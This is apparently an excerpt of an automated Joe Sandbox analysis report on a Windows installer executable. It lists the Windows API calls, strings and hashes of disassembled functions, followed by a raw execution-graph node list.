                                                                                            • Instruction ID: cc137df54ae1fcbb63b87987e69a719e9c27c4b31815d0debc5c9b1d2781c89a
                                                                                            • Opcode Fuzzy Hash: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                                            • Instruction Fuzzy Hash: F8515374B00548ABDB00EBA59891A5F7769DB88304F50D5BBB515BB3C6CA3DCA058F1C
                                                                                            APIs
                                                                                            • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                                            • LocalFree.KERNEL32(0053AFF8,00000000,00401AB4), ref: 00401A1B
                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,0053AFF8,00000000,00401AB4), ref: 00401A3A
                                                                                            • LocalFree.KERNEL32(0053BFF8,?,00000000,00008000,0053AFF8,00000000,00401AB4), ref: 00401A79
                                                                                            • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                                            • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 3782394904-0
                                                                                            • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                            • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                                            • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                            • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                                            APIs
                                                                                            • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                                            • ExitProcess.KERNEL32 ref: 00403DE5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExitMessageProcess
                                                                                            • String ID: Error$Runtime error at 00000000$9@
                                                                                            • API String ID: 1220098344-1503883590
                                                                                            • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                            • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                                            • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                            • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                                            • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                                            • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$AllocString
                                                                                            • String ID:
                                                                                            • API String ID: 262959230-0
                                                                                            • Opcode ID: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                            • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                                            • Opcode Fuzzy Hash: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                            • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(00000000,0040A60E), ref: 004030E3
                                                                                            • GetCommandLineA.KERNEL32(00000000,0040A60E), ref: 004030EE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CommandHandleLineModule
                                                                                            • String ID: U1hd.@$`&R
                                                                                            • API String ID: 2123368496-3738744790
                                                                                            • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                            • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                                            • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                            • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                                            APIs
                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,00409918,00000000), ref: 00406E4C
                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: QueryValue
                                                                                            • String ID: )q@
                                                                                            • API String ID: 3660427363-2284170586
                                                                                            • Opcode ID: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                            • Instruction ID: 22a93fbabe645b78fd14ced98f65bd4bcb22fe3fd6f8222f7fa8e6a3c98f8dfc
                                                                                            • Opcode Fuzzy Hash: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                            • Instruction Fuzzy Hash: E6415E31D0021AAFDB21DF95C881BAFB7B8EB04704F56447AE901F7280D738AF108B99
                                                                                            APIs
                                                                                            • MessageBoxA.USER32(00000000,00000000,Setup,00000010), ref: 00409CBD
                                                                                            Strings
                                                                                            • The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si, xrefs: 00409CA1
                                                                                            • Setup, xrefs: 00409CAD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message
                                                                                            • String ID: Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si
                                                                                            • API String ID: 2030045667-3271211647
                                                                                            • Opcode ID: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                            • Instruction ID: b8b600ed6bdfe48e96a015bdf4867c85bc36f5512d0f27a60c0f94c744360238
                                                                                            • Opcode Fuzzy Hash: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                            • Instruction Fuzzy Hash: 8EE0E5302482087EE311EA528C13F6A7BACE789B04F600477F900B15C3D6786E00A068
                                                                                            APIs
                                                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 004094F7
                                                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409507
                                                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 0040951A
                                                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409524
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastSleep
                                                                                            • String ID:
                                                                                            • API String ID: 1458359878-0
                                                                                            • Opcode ID: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                            • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                                            • Opcode Fuzzy Hash: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                            • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

Execution Graph

Execution Coverage: 16%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 4.6%
Total number of Nodes: 2000
Total number of Limit Nodes: 87
execution_graph: [interactive call-graph widget; its node and edge data (node addresses, API-call counts and successor links, e.g. 40cd00, 492848, 498ba8) is not reproduced here]
54401->54402 54403 408799 54402->54403 54458 4085b4 GetLocaleInfoA 54403->54458 54406 4085b4 GetLocaleInfoA 54407 4087c9 54406->54407 54408 408568 19 API calls 54407->54408 54409 4087e3 54408->54409 54410 4085b4 GetLocaleInfoA 54409->54410 54411 408800 54410->54411 54453 4085a1 54452->54453 54454 40858f 54452->54454 54456 403494 4 API calls 54453->54456 54455 4034e0 18 API calls 54454->54455 54457 40859f 54455->54457 54456->54457 54457->54398 54459 4085d0 54458->54459 54459->54406 55817 42f520 55818 42f52b 55817->55818 55819 42f52f NtdllDefWindowProc_A 55817->55819 55819->55818 50282 416b42 50283 416bea 50282->50283 50284 416b5a 50282->50284 50301 41531c 18 API calls 50283->50301 50286 416b74 SendMessageA 50284->50286 50287 416b68 50284->50287 50297 416bc8 50286->50297 50288 416b72 CallWindowProcA 50287->50288 50289 416b8e 50287->50289 50288->50297 50298 41a058 GetSysColor 50289->50298 50292 416b99 SetTextColor 50293 416bae 50292->50293 50299 41a058 GetSysColor 50293->50299 50295 416bb3 SetBkColor 50300 41a6e0 GetSysColor CreateBrushIndirect 50295->50300 50298->50292 50299->50295 50300->50297 50301->50297 55820 4358e0 55821 4358f5 55820->55821 55824 43590f 55821->55824 55826 4352c8 55821->55826 55833 435312 55826->55833 55836 4352f8 55826->55836 55827 403400 4 API calls 55828 435717 55827->55828 55828->55824 55839 435728 18 API calls 55828->55839 55829 446da4 18 API calls 55829->55836 55830 403744 18 API calls 55830->55836 55831 403450 18 API calls 55831->55836 55832 402648 18 API calls 55832->55836 55833->55827 55835 431ca0 18 API calls 55835->55836 55836->55829 55836->55830 55836->55831 55836->55832 55836->55833 55836->55835 55837 4038a4 18 API calls 55836->55837 55840 4343b0 55836->55840 55852 434b74 18 API calls 55836->55852 55837->55836 55839->55824 55841 43446d 55840->55841 55842 4343dd 55840->55842 55871 434310 18 API calls 55841->55871 55843 403494 4 API calls 55842->55843 55845 4343eb 55843->55845 55847 403778 18 API calls 55845->55847 55846 43445f 55848 
403400 4 API calls 55846->55848 55850 43440c 55847->55850 55849 4344bd 55848->55849 55849->55836 55850->55846 55853 494944 55850->55853 55852->55836 55854 49497c 55853->55854 55855 494a14 55853->55855 55857 403494 4 API calls 55854->55857 55872 448930 55855->55872 55860 494987 55857->55860 55858 494997 55859 403400 4 API calls 55858->55859 55861 494a38 55859->55861 55860->55858 55862 4037b8 18 API calls 55860->55862 55863 403400 4 API calls 55861->55863 55865 4949b0 55862->55865 55864 494a40 55863->55864 55864->55850 55865->55858 55866 4037b8 18 API calls 55865->55866 55867 4949d3 55866->55867 55868 403778 18 API calls 55867->55868 55869 494a04 55868->55869 55870 403634 18 API calls 55869->55870 55870->55855 55871->55846 55873 448955 55872->55873 55874 448998 55872->55874 55875 403494 4 API calls 55873->55875 55877 4489ac 55874->55877 55884 44852c 55874->55884 55876 448960 55875->55876 55881 4037b8 18 API calls 55876->55881 55879 403400 4 API calls 55877->55879 55880 4489df 55879->55880 55880->55858 55882 44897c 55881->55882 55883 4037b8 18 API calls 55882->55883 55883->55874 55885 403494 4 API calls 55884->55885 55886 448562 55885->55886 55887 4037b8 18 API calls 55886->55887 55888 448574 55887->55888 55889 403778 18 API calls 55888->55889 55890 448595 55889->55890 55891 4037b8 18 API calls 55890->55891 55892 4485ad 55891->55892 55893 403778 18 API calls 55892->55893 55894 4485d8 55893->55894 55895 4037b8 18 API calls 55894->55895 55905 4485f0 55895->55905 55896 448628 55898 403420 4 API calls 55896->55898 55897 4486c3 55901 4486cb GetProcAddress 55897->55901 55902 448708 55898->55902 55899 44864b LoadLibraryExA 55899->55905 55900 44865d LoadLibraryA 55900->55905 55903 4486de 55901->55903 55902->55877 55903->55896 55904 403b80 18 API calls 55904->55905 55905->55896 55905->55897 55905->55899 55905->55900 55905->55904 55906 403450 18 API calls 55905->55906 55908 43da88 18 API calls 55905->55908 55906->55905 55908->55905 50302 416644 50303 416651 50302->50303 50304 
4166ab 50302->50304 50309 416550 CreateWindowExA 50303->50309 50305 416658 SetPropA SetPropA 50305->50304 50306 41668b 50305->50306 50307 41669e SetWindowPos 50306->50307 50307->50304 50309->50305 55909 4222e4 55910 4222f3 55909->55910 55915 421274 55910->55915 55913 422313 55916 4212e3 55915->55916 55918 421283 55915->55918 55921 4212f4 55916->55921 55940 4124d0 GetMenuItemCount GetMenuStringA GetMenuState 55916->55940 55918->55916 55939 408d2c 33 API calls 55918->55939 55919 4213ba 55923 4213ce SetMenu 55919->55923 55936 421393 55919->55936 55920 421322 55926 421395 55920->55926 55930 42133d 55920->55930 55921->55919 55921->55920 55922 4213e6 55943 4211bc 24 API calls 55922->55943 55923->55936 55928 4213a9 55926->55928 55926->55936 55927 4213ed 55927->55913 55938 4221e8 10 API calls 55927->55938 55931 4213b2 SetMenu 55928->55931 55932 421360 GetMenu 55930->55932 55930->55936 55931->55936 55933 421383 55932->55933 55934 42136a 55932->55934 55941 4124d0 GetMenuItemCount GetMenuStringA GetMenuState 55933->55941 55937 42137d SetMenu 55934->55937 55936->55922 55942 421e2c 25 API calls 55936->55942 55937->55933 55938->55913 55939->55918 55940->55921 55941->55936 55942->55922 55943->55927 55944 44b4a8 55945 44b4b6 55944->55945 55947 44b4d5 55944->55947 55946 44b38c 25 API calls 55945->55946 55945->55947 55946->55947 55948 448728 55949 448756 55948->55949 55950 44875d 55948->55950 55953 403400 4 API calls 55949->55953 55951 448771 55950->55951 55954 44852c 21 API calls 55950->55954 55951->55949 55952 403494 4 API calls 55951->55952 55955 44878a 55952->55955 55956 448907 55953->55956 55954->55951 55957 4037b8 18 API calls 55955->55957 55958 4487a6 55957->55958 55959 4037b8 18 API calls 55958->55959 55960 4487c2 55959->55960 55960->55949 55961 4487d6 55960->55961 55962 4037b8 18 API calls 55961->55962 55963 4487f0 55962->55963 55964 431bd0 18 API calls 55963->55964 55965 448812 55964->55965 55966 448832 55965->55966 55967 431ca0 18 API calls 55965->55967 55968 448870 
55966->55968 55991 4435d0 18 API calls 55966->55991 55967->55965 55969 448888 55968->55969 55992 4435d0 18 API calls 55968->55992 55980 442334 55969->55980 55972 4488bc GetLastError 55993 4484c0 18 API calls 55972->55993 55975 4488cb 55994 443610 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55975->55994 55977 4488e0 55995 443620 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55977->55995 55979 4488e8 55981 443312 55980->55981 55982 44236d 55980->55982 55984 403400 4 API calls 55981->55984 55983 403400 4 API calls 55982->55983 55985 442375 55983->55985 55986 443327 55984->55986 55987 431bd0 18 API calls 55985->55987 55986->55972 55988 442381 55987->55988 55989 443302 55988->55989 55996 441a0c 18 API calls 55988->55996 55989->55972 55991->55966 55992->55969 55993->55975 55994->55977 55995->55979 55996->55988 55997 4165ec DestroyWindow 55998 42e3ef SetErrorMode 50310 441394 50311 44139d 50310->50311 50312 4413ab WriteFile 50310->50312 50311->50312 50313 4413b6 50312->50313 55999 491bf8 56000 491c32 55999->56000 56001 491c3e 56000->56001 56002 491c34 56000->56002 56004 491c4d 56001->56004 56005 491c76 56001->56005 56195 409098 MessageBeep 56002->56195 56007 446ff8 32 API calls 56004->56007 56012 491cae 56005->56012 56013 491c85 56005->56013 56006 403420 4 API calls 56008 49228a 56006->56008 56009 491c5a 56007->56009 56010 403400 4 API calls 56008->56010 56196 406bb0 56009->56196 56014 492292 56010->56014 56019 491cbd 56012->56019 56020 491ce6 56012->56020 56016 446ff8 32 API calls 56013->56016 56018 491c92 56016->56018 56204 406c00 18 API calls 56018->56204 56022 446ff8 32 API calls 56019->56022 56027 491d0e 56020->56027 56028 491cf5 56020->56028 56025 491cca 56022->56025 56023 491c9d 56205 44734c 19 API calls 56023->56205 56206 406c34 18 API calls 56025->56206 56034 491d1d 56027->56034 56035 491d42 56027->56035 56208 407280 19 API calls 56028->56208 56030 491cd5 56207 44734c 19 API calls 56030->56207 56031 491cfd 56209 44734c 19 API calls 56031->56209 56036 446ff8 
32 API calls 56034->56036 56038 491d7a 56035->56038 56039 491d51 56035->56039 56037 491d2a 56036->56037 56040 4072a8 SetCurrentDirectoryA 56037->56040 56046 491d89 56038->56046 56047 491db2 56038->56047 56041 446ff8 32 API calls 56039->56041 56042 491d32 56040->56042 56043 491d5e 56041->56043 56210 4470d0 19 API calls 56042->56210 56045 42c804 19 API calls 56043->56045 56048 491d69 56045->56048 56049 446ff8 32 API calls 56046->56049 56052 491dfe 56047->56052 56053 491dc1 56047->56053 56211 44734c 19 API calls 56048->56211 56051 491d96 56049->56051 56212 4071f8 22 API calls 56051->56212 56059 491e0d 56052->56059 56060 491e36 56052->56060 56055 446ff8 32 API calls 56053->56055 56058 491dd0 56055->56058 56056 491da1 56213 44734c 19 API calls 56056->56213 56061 446ff8 32 API calls 56058->56061 56062 446ff8 32 API calls 56059->56062 56067 491e6e 56060->56067 56068 491e45 56060->56068 56063 491de1 56061->56063 56064 491e1a 56062->56064 56214 4918fc 22 API calls 56063->56214 56066 42c8a4 19 API calls 56064->56066 56070 491e25 56066->56070 56075 491e7d 56067->56075 56076 491ea6 56067->56076 56071 446ff8 32 API calls 56068->56071 56069 491ded 56215 44734c 19 API calls 56069->56215 56216 44734c 19 API calls 56070->56216 56074 491e52 56071->56074 56077 42c8cc 19 API calls 56074->56077 56078 446ff8 32 API calls 56075->56078 56083 491ede 56076->56083 56084 491eb5 56076->56084 56079 491e5d 56077->56079 56081 491e8a 56078->56081 56217 44734c 19 API calls 56079->56217 56218 42c8fc 19 API calls 56081->56218 56090 491eed 56083->56090 56091 491f16 56083->56091 56085 446ff8 32 API calls 56084->56085 56087 491ec2 56085->56087 56086 491e95 56219 44734c 19 API calls 56086->56219 56089 42c92c 19 API calls 56087->56089 56092 491ecd 56089->56092 56093 446ff8 32 API calls 56090->56093 56096 491f62 56091->56096 56097 491f25 56091->56097 56220 44734c 19 API calls 56092->56220 56095 491efa 56093->56095 56098 42c954 19 API calls 56095->56098 56104 491f71 56096->56104 56105 491fb4 56096->56105 
56099 446ff8 32 API calls 56097->56099 56100 491f05 56098->56100 56101 491f34 56099->56101 56221 44734c 19 API calls 56100->56221 56103 446ff8 32 API calls 56101->56103 56107 491f45 56103->56107 56106 446ff8 32 API calls 56104->56106 56112 491fc3 56105->56112 56113 492027 56105->56113 56108 491f84 56106->56108 56222 42c4f8 19 API calls 56107->56222 56110 446ff8 32 API calls 56108->56110 56114 491f95 56110->56114 56111 491f51 56223 44734c 19 API calls 56111->56223 56116 446ff8 32 API calls 56112->56116 56120 492066 56113->56120 56121 492036 56113->56121 56224 491af4 26 API calls 56114->56224 56118 491fd0 56116->56118 56187 42c608 21 API calls 56118->56187 56119 491fa3 56225 44734c 19 API calls 56119->56225 56131 4920a5 56120->56131 56132 492075 56120->56132 56124 446ff8 32 API calls 56121->56124 56128 492043 56124->56128 56125 491fde 56126 491fe2 56125->56126 56127 492017 56125->56127 56130 446ff8 32 API calls 56126->56130 56227 4470d0 19 API calls 56127->56227 56228 452908 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection DeleteFileA GetLastError 56128->56228 56135 491ff1 56130->56135 56140 4920e4 56131->56140 56141 4920b4 56131->56141 56136 446ff8 32 API calls 56132->56136 56134 492050 56229 4470d0 19 API calls 56134->56229 56188 452c80 56135->56188 56139 492082 56136->56139 56144 452770 5 API calls 56139->56144 56151 49212c 56140->56151 56152 4920f3 56140->56152 56145 446ff8 32 API calls 56141->56145 56142 492061 56169 491c39 56142->56169 56143 492001 56226 4470d0 19 API calls 56143->56226 56147 49208f 56144->56147 56148 4920c1 56145->56148 56230 4470d0 19 API calls 56147->56230 56231 452e10 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 56148->56231 56157 49213b 56151->56157 56158 492174 56151->56158 56154 446ff8 32 API calls 56152->56154 56153 4920ce 56232 4470d0 19 API calls 56153->56232 56156 492102 56154->56156 56159 446ff8 32 API calls 56156->56159 56160 446ff8 32 API calls 
56157->56160 56163 492187 56158->56163 56167 49223d 56158->56167 56161 492113 56159->56161 56162 49214a 56160->56162 56165 447278 19 API calls 56161->56165 56164 446ff8 32 API calls 56162->56164 56166 446ff8 32 API calls 56163->56166 56168 49215b 56164->56168 56165->56169 56170 4921b4 56166->56170 56167->56169 56236 446f9c 32 API calls 56167->56236 56174 447278 19 API calls 56168->56174 56169->56006 56171 446ff8 32 API calls 56170->56171 56172 4921cb 56171->56172 56233 407ddc 21 API calls 56172->56233 56174->56169 56175 492256 56176 42e8c8 19 API calls 56175->56176 56177 49225e 56176->56177 56237 44734c 19 API calls 56177->56237 56180 4921ed 56181 446ff8 32 API calls 56180->56181 56182 492201 56181->56182 56234 408508 18 API calls 56182->56234 56184 49220c 56235 44734c 19 API calls 56184->56235 56186 492218 56187->56125 56189 452724 2 API calls 56188->56189 56191 452c99 56189->56191 56190 452c9d 56190->56143 56191->56190 56192 452cc1 MoveFileA GetLastError 56191->56192 56193 452760 Wow64RevertWow64FsRedirection 56192->56193 56194 452ce7 56193->56194 56194->56143 56195->56169 56197 406bbf 56196->56197 56198 406bd8 56197->56198 56200 406be1 56197->56200 56199 403400 4 API calls 56198->56199 56201 406bdf 56199->56201 56202 403778 18 API calls 56200->56202 56203 44734c 19 API calls 56201->56203 56202->56201 56203->56169 56204->56023 56205->56169 56206->56030 56207->56169 56208->56031 56209->56169 56210->56169 56211->56169 56212->56056 56213->56169 56214->56069 56215->56169 56216->56169 56217->56169 56218->56086 56219->56169 56220->56169 56221->56169 56222->56111 56223->56169 56224->56119 56225->56169 56226->56169 56227->56169 56228->56134 56229->56142 56230->56169 56231->56153 56232->56169 56233->56180 56234->56184 56235->56186 56236->56175 56237->56169 56238 40cc34 56241 406f10 WriteFile 56238->56241 56242 406f2d 56241->56242 50314 48095d 50319 451004 50314->50319 50316 480971 50329 47fa0c 50316->50329 50318 480995 50320 451011 50319->50320 50322 451065 50320->50322 
50338 408c0c 18 API calls 50320->50338 50335 450e88 50322->50335 50326 45108d 50327 4510d0 50326->50327 50340 408c0c 18 API calls 50326->50340 50327->50316 50345 40b3c8 50329->50345 50331 47fa79 50331->50318 50334 47fa2e 50334->50331 50349 4069dc 50334->50349 50352 476994 50334->50352 50341 450e34 50335->50341 50338->50322 50339 408c0c 18 API calls 50339->50326 50340->50327 50342 450e46 50341->50342 50343 450e57 50341->50343 50344 450e4b InterlockedExchange 50342->50344 50343->50326 50343->50339 50344->50343 50346 40b3d3 50345->50346 50347 40b3f3 50346->50347 50368 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50346->50368 50347->50334 50350 402648 18 API calls 50349->50350 50351 4069e7 50350->50351 50351->50334 50362 476a0e 50352->50362 50364 4769c5 50352->50364 50353 476a59 50369 451294 50353->50369 50355 476a70 50357 403420 4 API calls 50355->50357 50359 476a8a 50357->50359 50358 4038a4 18 API calls 50358->50362 50359->50334 50362->50353 50362->50358 50363 403450 18 API calls 50362->50363 50365 403744 18 API calls 50362->50365 50367 451294 35 API calls 50362->50367 50363->50362 50364->50362 50366 451294 35 API calls 50364->50366 50375 4038a4 50364->50375 50384 403744 50364->50384 50388 403450 50364->50388 50365->50362 50366->50364 50367->50362 50368->50347 50370 4512af 50369->50370 50374 4512a4 50369->50374 50394 451238 35 API calls 50370->50394 50372 4512ba 50372->50374 50395 408c0c 18 API calls 50372->50395 50374->50355 50376 4038b1 50375->50376 50383 4038e1 50375->50383 50378 4038da 50376->50378 50380 4038bd 50376->50380 50377 403400 4 API calls 50379 4038cb 50377->50379 50381 4034bc 18 API calls 50378->50381 50379->50364 50396 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50380->50396 50381->50383 50383->50377 50385 40374a 50384->50385 50387 40375b 50384->50387 50386 4034bc 18 API calls 50385->50386 50385->50387 50386->50387 50387->50364 50389 403454 50388->50389 50390 403464 50388->50390 50389->50390 50392 4034bc 18 API calls 50389->50392 
